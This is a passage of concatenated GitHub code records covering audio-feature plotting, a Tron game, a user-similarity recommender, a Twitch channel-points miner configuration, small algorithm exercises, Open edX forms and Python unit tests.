int(SAMPLING_RATE * WINDOW)  # 8820\nHOP_LENGTH = int(SAMPLING_RATE * SHIFT)  # 4410\n\n\n##################################################\n# for timbre\n##################################################\n\ndef plot_mfcc(y):\n    \"\"\" plot MFCC \"\"\"\n\n    # compute MFCC, first delta, second delta\n    mfcc, delta1_mfcc, delta2_mfcc = feature_extraction.mfcc(y)\n\n    # plot\n    plt.clf()\n    plt.figure(figsize=(12, 6))\n    # - MFCC\n    plt.subplot(311)\n    librosa.display.specshow(mfcc)\n    plt.ylabel('MFCC')\n    plt.colorbar()\n    # - first delta\n    plt.subplot(312)\n    librosa.display.specshow(delta1_mfcc)\n    plt.ylabel('MFCC-$\\\Delta$')\n    plt.colorbar()\n    # - second delta\n    plt.subplot(313)\n    librosa.display.specshow(delta2_mfcc, sr=SAMPLING_RATE, x_axis='time')\n    plt.ylabel('MFCC-$\\\Delta^2$')\n    plt.colorbar()\n\n    plt.savefig('../../graph/' + 'mfcc.png', dpi=300)\n    plt.tight_layout()\n\n\ndef plot_power(y):\n    \"\"\" plot power \"\"\"\n\n    # compute log power spectrogram\n    S, phase = librosa.magphase(librosa.stft(y,\n                                             n_fft=N_FFT,\n                                             hop_length=HOP_LENGTH))\n    log_P = librosa.logamplitude(S**2, ref_power=np.max)\n\n    # compute power, first delta\n    power, delta1_power = feature_extraction.power(y)\n\n    # plot\n    plt.clf()\n    plt.figure(figsize=(12, 6))\n    # - power\n    plt.subplot(311)\n    plt.semilogy(power.T, label='RMS Energy')\n    plt.xticks([])\n    plt.xlim([0, power.shape[-1]])\n    plt.legend(loc='best')\n    # - first delta\n    plt.subplot(312)\n    plt.semilogy(delta1_power.T, label='RMS Energy-$\\\Delta$')\n    plt.xticks([])\n    plt.xlim([0, delta1_power.shape[-1]])\n    plt.legend(loc='best')\n    # - log power spectrogram\n    plt.subplot(313)\n    librosa.display.specshow(log_P, y_axis='log', x_axis='time')\n    plt.title('log Power spectrogram')\n    # plt.colorbar()\n\n    plt.savefig('../../graph/' + 'power.png', dpi=300)\n    plt.tight_layout()\n    # Why is only part of the track displayed?\n    # The Hz axis is being displayed\n\n\n##################################################\n# for harmony\n##################################################\n\ndef plot_chroma(y):\n    \"\"\" plot chromagram \"\"\"\n\n    # compute chromagram\n    C = feature_extraction.chroma(y)\n\n    # plot\n    plt.clf()\n    plt.figure(figsize=(12, 5))\n    # Display the chromagram: the energy in each chromatic pitch class as a function of time\n    # To make sure that the colors span the full range of chroma values,\n    # set vmin and vmax\n    
librosa.display.specshow(C,\n sr=SAMPLING_RATE,\n x_axis='time',\n y_axis='chroma',\n vmin=0,\n vmax=1)\n plt.title('Chromagram')\n plt.colorbar()\n\n plt.savefig('../../graph/' + 'chroma.png', dvi=300)\n plt.tight_layout()\n\n\n##################################################\n# for tempo\n##################################################\n\ndef plot_tempogram(y):\n \"\"\" plot tempogram \"\"\"\n\n # compute tempogram\n tempogram = feature_extraction.tempogram(y)\n\n # plot\n plt.clf()\n\n\n##################################################\n# for rhythm\n##################################################\n\ndef plot_mel_spectrogram(y):\n \"\"\" plot Mel spectrogram \"\"\"\n\n # compute Mel spectrogram\n log_S = feature_extraction.mel_spectrogram(y)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 5))\n librosa.display.specshow(log_S, sr=SAMPLING_RATE,\n x_axis='time', y_axis='mel', fmax=8000)\n plt.title('mel power spectrogram')\n plt.colorbar(format='%+02.0f dB')\n\n plt.savefig('../../graph/' + 'mel_spectrogram.png', dvi=300)\n plt.tight_layout()\n\n\ndef plot_mel_spectrogram_harmonic_percussive(y):\n \"\"\" plot harmonic and percussive Mel spectrogram \"\"\"\n\n # compute harmonic and percussive Mel spectrogram\n y_harmonic, y_percussive = librosa.effects.hpss(y)\n log_Sh = feature_extraction.mel_spectrogram(y_harmonic)\n log_Sp = feature_extraction.mel_spectrogram(y_percussive)\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - harmonic\n plt.subplot(211)\n librosa.display.specshow(log_Sh, sr=SAMPLING_RATE, y_axis='mel')\n plt.title('mel power spectrogram (Harmonic)')\n plt.colorbar(format='%+02.0f dB')\n # - percussive\n plt.subplot(212)\n librosa.display.specshow(log_Sp, sr=SAMPLING_RATE,\n x_axis='time', y_axis='mel')\n plt.title('mel power spectrogram (Percussive)')\n plt.colorbar(format='%+02.0f dB')\n\n plt.savefig('../../graph/' + 'harmonic_percussive.png', dvi=300)\n plt.tight_layout()\n\n\n##################################################\n# for vocal\n##################################################\n\ndef plot_f0(y):\n \"\"\" plot F0 \"\"\"\n\n # compute F0, first delta\n f0, delta1_f0 = feature_extraction.f0(y)\n\n #️⃣ うまく表示されてない\n\n # plot\n plt.clf()\n plt.figure(figsize=(12, 6))\n # - F0\n plt.subplot(211)\n plt.semilogy(f0.T, label='RMS Energy')\n plt.xticks([])\n plt.xlim([0, f0.shape[-1]])\n plt.legend(loc='best')\n # - first delta\n # plt.subplot(211)\n # plt.semilogy(power.T, label='RMS Energy')\n # plt.xticks([])\n # plt.xlim([0, power.shape[-1]])\n # plt.legend(loc='best')\n\n # plt.title('log Power spectrogram')\n plt.savefig('../../graph/' + 'f0.png', dvi=300)\n plt.tight_layout()\n\n\ndef main():\n filepath = '../../wav/1000/100000271.wav'\n y = feature_extraction.read_wav_file(filepath)\n # plot_mfcc(y)\n plot_power(y)\n # plot_mel_spectrogram(y)\n # plot_mel_spectrogram_harmonic_percussive(y)\n\n plot_f0(y)\n # plot_chroma(y)\n # plot_tempogram(y)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hirofumi0810/music_recommendation","sub_path":"src/plot/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21686428344","text":"import time\nimport os\nimport multiprocessing as mp\n\nfrom compose.cli.main import TopLevelCommand, project_from_options\nfrom urllib import request, parse\n\nfrom tests.common.docker import FTDocker\n\n\ndef get_data_from_graphite_render_api(target, **other_options):\n base_url = 
\"http://localhost/render\"\n #\"?target=&format=raw&from=-1800s\"\n parms = {\n \"target\": target,\n \"format\": \"raw\",\n \"from\": \"-10s\",\n }\n parms.update(other_options)\n querystring = parse.urlencode(parms)\n u = request.urlopen(base_url+\"?\"+querystring)\n #print(\"[X] URL='{}'\".format(base_url+\"?\"+querystring))\n resp = u.read()\n return resp.decode()\n\n\nclass Graphite(FTDocker):\n \"\"\"This class is an interface to Graphite through docker-compose. It can create\n and manipulate a Graphite system.\n \"\"\"\n \n def __init__(self):\n base = os.path.dirname(__file__)\n super().__init__(os.path.join(base, \"data/graphite\"))\n\n \n\nif __name__ == \"__main__\":\n # some test:\n g = Graphite()\n g.down()\n g.up()\n g.wait_until_running()\n time.sleep(60)\n g.down()\n\n\n","repo_name":"palao/FrUCToSA","sub_path":"tests/functional/graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74674645202","text":"class Solution:\n def smallestGoodBase(self, n: str) -> str:\n n = int(n)\n result = n - 1 # each number n has good base n - 1\n\n # n = k^i + k^(i-1) + k^(i-2) + ... + k^2 + k + 1\n for i in range(2, 64): # 10^18 < 2^64\n k = floor(n**(1 / i)) # i-th root of n\n if k == 1:\n break\n\n s = sum(k**j for j in range(i + 1))\n if s == n:\n result = k\n\n return str(result)\n","repo_name":"stbrumme/leetcode","sub_path":"0483.py","file_name":"0483.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38546530494","text":"#!/usr/bin/env python3\n# game.py\n\nfrom wall import Wall\nfrom window import Window\nfrom player import Player\nfrom time import clock\n__author__ = 'Seth Tinglof'\n__version__ = '1.0'\n\n\nclass Game:\n\n SIZE_X = 1280\n SIZE_Y = 720\n\n def __init__(self):\n \"\"\"\n Starts a new Tron game\n :return: self\n \"\"\"\n self.walls = []\n self.characters = []\n self.playing = True\n self.blue_score = 0\n self.red_score = 0\n self.frame = 0\n self.create_characters()\n self.create_initial_walls()\n self.wall_start = [[100, 350], [1180, 350]]\n self.window = Window(self.characters, self.walls)\n self.window.root.after(10, self.intro)\n self.window.root.mainloop()\n\n def create_characters(self):\n \"\"\"\n Creates the players characters\n :return: None\n \"\"\"\n self.characters.append(Player(100, 350, 'blue', 0))\n self.characters.append(Player(1180, 350, 'red', 180))\n\n def create_initial_walls(self):\n \"\"\"\n Creates walls around the border of the map.\n :return: None\n \"\"\"\n self.walls.append(Wall(True, 0, 1280, 0, 'black'))\n self.walls.append(Wall(True, 0, 1280, 707, 'black'))\n self.walls.append(Wall(False, 0, 0, 720, 'black'))\n self.walls.append(Wall(False, 1280, 0, 720, 'black'))\n\n def create_wall(self, player_number):\n \"\"\"\n Creates a new wall that the players cannot cross based on the last position that the player turned and\n the players current position.\n :param player_number: The index of the player who the wall is being created from.\n :return: a new Wall object.\n \"\"\"\n horizontal = self.wall_start[player_number][1] == self.characters[player_number].get_y_pos()\n if horizontal:\n if self.wall_start[player_number][0] < self.characters[player_number].get_x_pos():\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.characters[player_number].get_x_pos(),\n 
","repo_name":"stbrumme/leetcode","sub_path":"0483.py","file_name":"0483.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38546530494","text":"#!/usr/bin/env python3\n# game.py\n\nfrom wall import Wall\nfrom window import Window\nfrom player import Player\nfrom time import perf_counter as clock  # time.clock was removed in Python 3.8\n__author__ = 'Seth Tinglof'\n__version__ = '1.0'\n\n\nclass Game:\n\n SIZE_X = 1280\n SIZE_Y = 720\n\n def __init__(self):\n \"\"\"\n Starts a new Tron game\n :return: None\n \"\"\"\n self.walls = []\n self.characters = []\n self.playing = True\n self.blue_score = 0\n self.red_score = 0\n self.frame = 0\n self.create_characters()\n self.create_initial_walls()\n self.wall_start = [[100, 350], [1180, 350]]\n self.window = Window(self.characters, self.walls)\n self.window.root.after(10, self.intro)\n self.window.root.mainloop()\n\n def create_characters(self):\n \"\"\"\n Creates the players' characters\n :return: None\n \"\"\"\n self.characters.append(Player(100, 350, 'blue', 0))\n self.characters.append(Player(1180, 350, 'red', 180))\n\n def create_initial_walls(self):\n \"\"\"\n Creates walls around the border of the map.\n :return: None\n \"\"\"\n self.walls.append(Wall(True, 0, 1280, 0, 'black'))\n self.walls.append(Wall(True, 0, 1280, 707, 'black'))\n self.walls.append(Wall(False, 0, 0, 720, 'black'))\n self.walls.append(Wall(False, 1280, 0, 720, 'black'))\n\n def create_wall(self, player_number):\n \"\"\"\n Creates a new wall that the players cannot cross based on the last position that the player turned and\n the player's current position.\n :param player_number: The index of the player who the wall is being created from.\n :return: a new Wall object.\n \"\"\"\n horizontal = self.wall_start[player_number][1] == self.characters[player_number].get_y_pos()\n if horizontal:\n if self.wall_start[player_number][0] < self.characters[player_number].get_x_pos():\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.characters[player_number].get_x_pos(),\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n new_wall = Wall(horizontal, self.characters[player_number].get_x_pos(), self.wall_start[player_number][0],\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n if self.wall_start[player_number][1] < self.characters[player_number].get_y_pos():\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.wall_start[player_number][1],\n self.characters[player_number].get_y_pos(), self.characters[player_number].get_color())\n else:\n new_wall = Wall(horizontal, self.wall_start[player_number][0], self.characters[player_number].get_y_pos(),\n self.wall_start[player_number][1], self.characters[player_number].get_color())\n return new_wall\n\n def add_wall(self, player_num):\n \"\"\"\n Adds a wall to the list of walls that the player has drawn. This wall lasts the duration of the game.\n This method is meant only to be used when the player turns.\n :param player_num: Index of player that is getting the new wall.\n :return: None\n \"\"\"\n wall = self.create_wall(player_num)\n self.walls.append(wall)\n self.characters[player_num].unhittable_walls[1] = wall\n self.wall_start[player_num] = [self.characters[player_num].get_x_pos(), self.characters[player_num].get_y_pos()]\n\n def create_temp_walls(self):\n \"\"\"\n Creates temporary walls that only last for this frame. These are the walls actively created behind the player.\n :return: the list of temporary Wall objects created for this frame.\n \"\"\"\n temp_walls = []\n for i in range(len(self.characters)):\n temp_walls.append(self.create_wall(i))\n self.walls.append(temp_walls[i])\n self.characters[i].unhittable_walls[0] = temp_walls[i]\n return temp_walls\n\n def delete_temp_walls(self, temp_walls):\n \"\"\"\n Removes temporary walls at the end of the frame.\n :param temp_walls: wall objects to be removed in a list.\n :return: None\n \"\"\"\n for wall in temp_walls:\n self.walls.remove(wall)\n\n def collisions_check(self):\n \"\"\"\n Checks if either player has hit a wall. If one player has, then the other wins.\n :return: None\n \"\"\"\n for wall in self.walls:\n for i in range(len(self.characters)):\n if wall.check_collision(self.characters[i]) and not wall == self.characters[i].unhittable_walls[0]\\\n and not wall == self.characters[i].unhittable_walls[1]:\n self.playing = False\n if i == 0:\n self.red_score += 1\n else:\n self.blue_score += 1\n self.window.set_score(self.blue_score, self.red_score)\n\n def intro(self):\n self.window.intro()\n self.window.play_button['command'] = self.start_game\n\n def start_game(self):\n \"\"\"\n Begins playing game for the first time.\n :return: None\n \"\"\"\n self.window.intro_frame.pack_forget()\n self.window.center_frame.pack()\n self.window.root.bind(\"<Key>\", self.key_pressed)\n self.game_loop()\n\n def game_loop(self):\n \"\"\"\n Main game loop. 
Runs for the duration of the game.\n :return: None\n \"\"\"\n while True:\n next_time = 0\n while self.playing:\n current_time = clock()\n if current_time >= next_time:\n for character in self.characters:\n character.move()\n temp_walls = self.create_temp_walls()\n self.window.update_canvas()\n self.collisions_check()\n self.delete_temp_walls(temp_walls)\n next_time = current_time + 1 / 60\n self.frame += 1\n self.walls = []\n self.characters = []\n self.window.walls = self.walls\n self.window.characters = self.characters\n self.playing = True\n self.create_characters()\n self.create_initial_walls()\n self.wall_start = [[100, 350], [1180, 350]]\n\n def key_pressed(self, event):\n \"\"\"\n Responds to key pressed events. Allows users to control their characters.\n :param event: Key pressed event.\n :return: None\n \"\"\"\n ######################\n # Player One\n ######################\n if event.char == 'a' and not self.characters[0].get_angle() == 0 \\\n and not self.characters[0].get_angle() == 180 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(180)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 'w' and not self.characters[0].get_angle() == 270 \\\n and not self.characters[0].get_angle() == 90 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(90)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 'd' and not self.characters[0].get_angle() == 180 \\\n and not self.characters[0].get_angle() == 0 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(0)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n elif event.char == 's' and not self.characters[0].get_angle() == 90 \\\n and not self.characters[0].get_angle() == 270 and self.characters[0].last_turn_frame <= self.frame - 2:\n self.characters[0].set_angle(270)\n self.add_wall(0)\n self.characters[0].last_turn_frame = self.frame\n ######################\n # Player Two\n ######################\n elif event.keysym == 'Left' and not self.characters[1].get_angle() == 0 \\\n and not self.characters[1].get_angle() == 180 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(180)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Up' and not self.characters[1].get_angle() == 270 \\\n and not self.characters[1].get_angle() == 90 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(90)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Right' and not self.characters[1].get_angle() == 180 \\\n and not self.characters[1].get_angle() == 0 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(0)\n self.add_wall(1)\n self.characters[1].last_turn_frame = self.frame\n elif event.keysym == 'Down' and not self.characters[1].get_angle() == 90 \\\n and not self.characters[1].get_angle() == 270 and self.characters[1].last_turn_frame <= self.frame - 2:\n self.characters[1].set_angle(270)\n self.add_wall(1)\n print(self.characters[1].last_turn_frame)\n print(self.frame)\n self.characters[1].last_turn_frame = self.frame\n","repo_name":"seth-tinglof/Tron-Like","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"12703789262","text":"import logging\n\nlogging.basicConfig(filename='./app.log',\n filemode='w', format='%(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n\nimport pandas as pd\nimport constants\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom tqdm import tqdm\n\n\n\nclass Similarity:\n \"\"\"\n For calculating and saving the user similarity matrix in a csv\n \"\"\"\n def __init__(self, file_name):\n self.file_name = file_name\n\n def create_similarity_matrix(self, user, aggregated_df):\n \"\"\"\n Compute cosine similarities between users and save the top-k matrix in the csv\n :param user: per-user feature vectors, row-aligned with aggregated_df\n :param aggregated_df: frame that carries the 'user_handle' column\n :return: void\n \"\"\"\n try:\n user_matrix = pd.DataFrame(user)\n user_matrix.index = aggregated_df['user_handle']\n user_sim_matrix = cosine_similarity(user_matrix)\n\n user_sim_matrix = pd.DataFrame(user_sim_matrix, columns=list(aggregated_df['user_handle']))\n\n user_sim_matrix['user_handle'] = aggregated_df['user_handle']\n\n user_sim_matrix.index = user_sim_matrix.user_handle.values\n\n cols_to_sort = user_sim_matrix.user_handle.tolist()\n\n user_based_top_similarity = []\n\n for val in tqdm(cols_to_sort):\n user_based_top_similarity.append(user_sim_matrix[val].\n sort_values(ascending=False).index.tolist()[1:constants.top_k + 1])\n\n top_columns = ['top_' + str(ind) for ind in range(1, constants.top_k + 1)]\n\n user_sim_matrix.reset_index(inplace=True)\n user_based_top_similarity_df = pd.DataFrame(user_based_top_similarity, columns=top_columns)\n user_based_top_similarity_df['user_handle'] = user_sim_matrix['user_handle']\n user_based_top_similarity_df.to_csv(self.file_name, index=False)\n\n except Exception as e:\n logging.error('Error in create_similarity_matrix: %s', e)\n raise e\n
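\n\n# Minimal usage sketch (hypothetical names; 'user_features' is whatever\n# per-user feature matrix the caller builds, row-aligned with aggregated_df):\n#\n# sim = Similarity('top_k_users.csv')\n# sim.create_similarity_matrix(user_features, aggregated_df)\n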
","repo_name":"karthiktsaliki/recommendations","sub_path":"similarity_calculation.py","file_name":"similarity_calculation.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1946853097","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom TwitchChannelPointsMiner import TwitchChannelPointsMiner\nfrom TwitchChannelPointsMiner.logger import LoggerSettings\nfrom TwitchChannelPointsMiner.classes.entities.Bet import Strategy, BetSettings\nfrom TwitchChannelPointsMiner.classes.entities.Streamer import Streamer, StreamerSettings\nfrom TwitchChannelPointsMiner.classes.TwitchBrowser import Browser, BrowserSettings\n\ntwitch_miner = TwitchChannelPointsMiner(\n    username=\"your-twitch-username\",\n    claim_drops_startup=False, # If you want to auto claim all drops from Twitch inventory on startup\n    logger_settings=LoggerSettings(\n        save=True, # If you want to save logs in a file (suggested)\n        console_level=logging.INFO, # Level of logs - use logging.DEBUG for more info\n        file_level=logging.DEBUG, # Level of logs - if you think the log file is too big, use logging.INFO\n        emoji=True, # On Windows there are problems printing emoji. Set to False if you have issues\n        less=False # If you think the logs are too verbose, set this to True\n    ),\n    browser_settings=BrowserSettings(\n        browser=Browser.FIREFOX, # Choose if you want to use Chrome or Firefox as browser\n        show=False, # Show the browser during bets, otherwise run in headless mode\n        do_screenshot=False, # Take a screenshot during the bet\n    ),\n    streamer_settings=StreamerSettings(\n        make_predictions=True, # If you want to bet / make predictions\n        follow_raid=True, # Follow raids to obtain more points\n        claim_drops=True, # We can't filter rewards based on stream. Set to False to skip the viewing counter increase; you will never obtain a drop reward from this script. Issue #21\n        watch_streak=True, # If a streamer goes online, change the priority of the streamers array and catch the watch streak. Issue #11\n        bet=BetSettings(\n            strategy=Strategy.SMART, # Choose your strategy!\n            percentage=5, # Place the x% of your channel points\n            percentage_gap=20, # Gap difference between outcomesA and outcomesB (for SMART strategy)\n            max_points=50000, # If the x% of your channel points is greater than max_points, bet this value instead\n        )\n    )\n)\n\n# You can customize the settings for each streamer. If no settings are provided, the script will use the streamer_settings from TwitchChannelPointsMiner.\n# If no streamer_settings are provided in TwitchChannelPointsMiner, the script will use default settings.\n# Each entry in the streamers array can be a string (a username) or a Streamer instance.\n\n# The settings priority is: settings in the mine function, settings in the TwitchChannelPointsMiner instance, default settings.\n# For example, if you don't provide a value for 'make_predictions' in the mine function but you have set it on the TwitchChannelPointsMiner instance, the script will take the value from there.\n# If you haven't set a value even in the instance, the default one will be used\n\ntwitch_miner.mine(\n    [\n        Streamer(\"streamer-username01\", settings=StreamerSettings(make_predictions=True , follow_raid=False , claim_drops=True , watch_streak=True , bet=BetSettings(strategy=Strategy.SMART , percentage=5 , percentage_gap=20 , max_points=234 ) )),\n        Streamer(\"streamer-username02\", settings=StreamerSettings(make_predictions=False , follow_raid=True , claim_drops=False , bet=BetSettings(strategy=Strategy.PERCENTAGE , percentage=5 , percentage_gap=20 , max_points=1234 ) )),\n        Streamer(\"streamer-username03\", settings=StreamerSettings(make_predictions=True , follow_raid=False , watch_streak=True , bet=BetSettings(strategy=Strategy.SMART , percentage=5 , percentage_gap=30 , max_points=50000 ) )),\n        Streamer(\"streamer-username04\", settings=StreamerSettings(make_predictions=False , follow_raid=True , watch_streak=True )),\n        Streamer(\"streamer-username05\", settings=StreamerSettings(make_predictions=True , follow_raid=True , claim_drops=True , watch_streak=True , bet=BetSettings(strategy=Strategy.HIGH_ODDS , percentage=7 , percentage_gap=20 , max_points=90 ) )),\n        Streamer(\"streamer-username06\"),\n        Streamer(\"streamer-username07\"),\n        Streamer(\"streamer-username08\"),\n        \"streamer-username09\",\n        \"streamer-username10\",\n        \"streamer-username11\"\n    ], # Array of streamers (order = priority)\n    followers=False # Automatically download the list of your followers (custom settings cannot be set for the followers list)\n)\n","repo_name":"anoviel/Twitch-Channel-Points-Miner-v2","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11819201519","text":"# Set a number. Build the list of Fibonacci numbers, including ones at negative indices (extra task).
\n\n# Example:\n\n# - for k = 8 the list looks like: [-21, 13, -8, 5, -3, 2, -1, 1, 0, 1, 1, 2, 3, 5, 8, 13, 21]\n\ndef nega_fibonacci(n):\n\n    if n == 0 or n == 1:\n        return n\n    elif n == -1:\n        return -n\n    elif n < 0:\n        return int(nega_fibonacci(abs(n)) * (-1)**(n + 1))\n    else:\n        return nega_fibonacci(n - 1) + nega_fibonacci(n - 2)\n\n\nn = int(input(\"Enter the sequence size: \"))\nfor i in range(-n, n + 1):\n    print(nega_fibonacci(i), end=' ')
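\n\n# The negative branch relies on the negafibonacci identity\n# F(-n) = (-1)**(n + 1) * F(n), e.g. F(-4) = -F(4) = -3 and F(-5) = F(5) = 5.\n# Sample run: entering 4 prints: -3 2 -1 1 0 1 1 2 3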
","repo_name":"ggscream/python_homework_3","sub_path":"Task_5.py","file_name":"Task_5.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12615777773","text":"\"\"\"\nDefines a form to provide validations for course-specific configuration.\n\"\"\"\nfrom django import forms\n\nfrom openedx.core.djangoapps.video_config.forms import CourseSpecificFlagAdminBaseForm\nfrom openedx.core.djangoapps.video_pipeline.models import (\n    CourseVideoUploadsEnabledByDefault,\n    VEMPipelineIntegration,\n)\n\n\nclass CourseVideoUploadsEnabledByDefaultAdminForm(CourseSpecificFlagAdminBaseForm):\n    \"\"\"\n    Form for course-specific Video Uploads enabled by default configuration.\n    \"\"\"\n\n    class Meta:\n        model = CourseVideoUploadsEnabledByDefault\n        fields = '__all__'\n\n\nclass VEMPipelineIntegrationAdminForm(forms.ModelForm):\n    \"\"\"\n    Form for VEM Pipeline Integration Admin class.\n    \"\"\"\n    class Meta:\n        model = VEMPipelineIntegration\n        fields = '__all__'\n","repo_name":"openedx/edx-platform","sub_path":"openedx/core/djangoapps/video_pipeline/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"32885083863","text":"from unittest import TestCase\nfrom amplifier import Amplifier\nfrom thruster import find_max_signal\n\n\nclass TestAmplifier(TestCase):\n    def test_wait(self):\n        code = [3, 3, 99, 0]\n        amplifier = Amplifier(code)\n        status, signal = amplifier.execute()\n        self.assertEqual(status, 'WAITING')\n        self.assertEqual(signal, None)\n        status, signal = amplifier.execute(10)\n        self.assertEqual(status, 'HALT')\n        self.assertEqual(signal, None)\n\n    def test_io(self):\n        code = [3, 9, 1002, 9, 2, 10, 4, 10, 99, 0, 0]\n        amplifier = Amplifier(code)\n        status, signal = amplifier.execute(3)\n        self.assertEqual(status, 'OUTPUT')\n        self.assertEqual(signal, 6)\n        status, signal = amplifier.execute()\n        self.assertEqual(status, 'HALT')\n        self.assertEqual(signal, None)\n\n    def test_sample_9(self):\n        code = [3, 3, 1107, -1, 8, 3, 4, 3, 99]\n        amplifier = Amplifier(code)\n        status, signal = amplifier.execute(0)\n        self.assertEqual(status, 'OUTPUT')\n        self.assertEqual(signal, 1)\n        status, signal = amplifier.execute()\n        self.assertEqual(status, 'HALT')\n        self.assertEqual(signal, None)\n\n    def test_sample_11(self):\n        code = [3, 12, 6, 12, 15, 1, 13, 14, 13, 4, 13, 99, -1, 0, 1, 9]\n        amplifier = Amplifier(code)\n        status, signal = amplifier.execute(1)\n        self.assertEqual(status, 'OUTPUT')\n        self.assertEqual(signal, 1)\n        status, signal = amplifier.execute()\n        self.assertEqual(status, 'HALT')\n        self.assertEqual(signal, None)\n\n\nclass TestFindMaxSignal(TestCase):\n    def test_sample_1(self):\n        code = '3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0'\n        code = [int(n) for n in code.split(',')]\n        self.assertEqual(find_max_signal(code), 43210)\n\n    def test_sample_2(self):\n        code = '3,23,3,24,1002,24,10,24,1002,23,-1,23,' + \\\n            '101,5,23,23,1,24,23,23,4,23,99,0,0'\n        code = [int(n) for n in code.split(',')]\n        self.assertEqual(find_max_signal(code), 54321)\n\n    def test_sample_3(self):\n        code = '3,31,3,32,1002,32,10,32,1001,31,-2,31,1007,31,0,33,' + \\\n            '1002,33,7,33,1,33,31,31,1,32,31,31,4,31,99,0,0,0'\n        code = [int(n) for n in code.split(',')]\n        self.assertEqual(find_max_signal(code), 65210)\n\n    def test_sample_4(self):\n        code = '3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,' + \\\n            '27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5'\n        code = [int(n) for n in code.split(',')]\n        self.assertEqual(find_max_signal(code, [5, 6, 7, 8, 9]), 139629729)\n\n    def test_sample_5(self):\n        code = '3,52,1001,52,-5,52,3,53,1,52,56,54,1007,54,5,55,1005,' + \\\n            '55,26,1001,54,-5,54,1105,1,12,1,53,54,53,1008,54,0,55,' + \\\n            '1001,55,1,55,2,53,55,53,4,53,1001,56,-1,56,1005,56,6,' + \\\n            '99,0,0,0,0,10'\n        code = [int(n) for n in code.split(',')]\n        self.assertEqual(find_max_signal(code, [5, 6, 7, 8, 9]), 18216)\n","repo_name":"mdumke/aoc2019","sub_path":"day07/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30027104213","text":"import unittest\nfrom funkcja_kwadratowa import function\n\nclass functionTest(unittest.TestCase):\n    def setUp(self):\n        self.a = 1\n        self.b = 1\n        self.c = 1\n        self.x_1 = 1\n\n    def test_function(self):\n        self.assertEqual(function(self.a, self.b, self.c, self.x_1, 1), 3.0)\n        self.assertEqual(function(2, 2, 1, 1, 1), 5)\n        self.assertEqual(function(-2, -2, -1, 2, 6), -13)\n\n    def test_error(self):\n        with self.assertRaises(TypeError):\n            function(\"1\", 1, 1, 1, 1)\n        # with self.assertRaises(ValueError):\n        #     function(0, 0, 0, 0, 0)\n\n\nif __name__ == \"__main__\":\n    unittest.main()","repo_name":"RadekKlucz/Jezyki-i-Biblioteki-Analizy-danych-AGH","sub_path":"Lab3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71886198800","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\nimport os\nimport sys\nimport numpy as np\nimport glob2\nimport h5py\nimport matplotlib.pyplot as plt\nimport cv2\nplt.rcParams[\"font.family\"] = \"Arial\"\n\nexperiment_path = \"experiment_1__2019-02-18_11-20-18\"\ntrial_path = \"Q0.15_W0.15_D0.6_T0.02500_wb0.0_decay18.0_seed24\"\nbase_exp_dir = f\"experiments/{experiment_path}/{trial_path}\"\n\n############# Functions\ndef read_config(base_exp_dir):\n    cfg_path = glob2.glob(\"config/files/*.cfg\")[4]\n\n    with open(cfg_path, \"r\") as infile:\n        lines = [line.split() for line in infile]\n        cfg_opts = {}\n        for key, val in lines:\n            key = key.replace('--', '')\n\n            try:\n                val = float(val)\n            except:\n                